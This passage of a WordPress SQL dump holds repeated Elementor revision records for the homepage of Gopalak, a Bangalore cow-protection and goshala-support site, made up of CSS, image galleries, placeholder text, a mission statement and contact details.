.elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-13 15:50:08','2022-10-13 10:20:08','',1373,'https://gopalak.in/?p=1702',0,'revision','',0),(1703,1,'2022-10-13 15:51:11','2022-10-13 10:21:11','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"50\" height=\"53\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 50px) 100vw, 50px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-karolina-grabowska-4219654-scaled.jpg\" alt=\"pexels-karolina-grabowska-4219654\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-ave-calvar-martinez-3637852-scaled.jpg\" alt=\"pexels-ave-calvar-martinez-3637852\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-13 15:51:11','2022-10-13 10:21:11','',1373,'https://gopalak.in/?p=1703',0,'revision','',0),(1704,1,'2022-10-13 15:51:11','2022-10-13 10:21:11','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"50\" height=\"53\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 50px) 100vw, 50px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-karolina-grabowska-4219654-scaled.jpg\" alt=\"pexels-karolina-grabowska-4219654\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-ave-calvar-martinez-3637852-scaled.jpg\" alt=\"pexels-ave-calvar-martinez-3637852\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-13 15:51:11','2022-10-13 10:21:11','',1373,'https://gopalak.in/?p=1704',0,'revision','',0),(1705,1,'2022-10-13 15:51:12','2022-10-13 10:21:12','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"50\" height=\"53\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 50px) 100vw, 50px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-karolina-grabowska-4219654-scaled.jpg\" alt=\"pexels-karolina-grabowska-4219654\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-ave-calvar-martinez-3637852-scaled.jpg\" alt=\"pexels-ave-calvar-martinez-3637852\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-13 15:51:12','2022-10-13 10:21:12','',1373,'https://gopalak.in/?p=1705',0,'revision','',0),(1706,1,'2022-10-13 15:52:00','2022-10-13 10:22:00','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"50\" height=\"53\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" 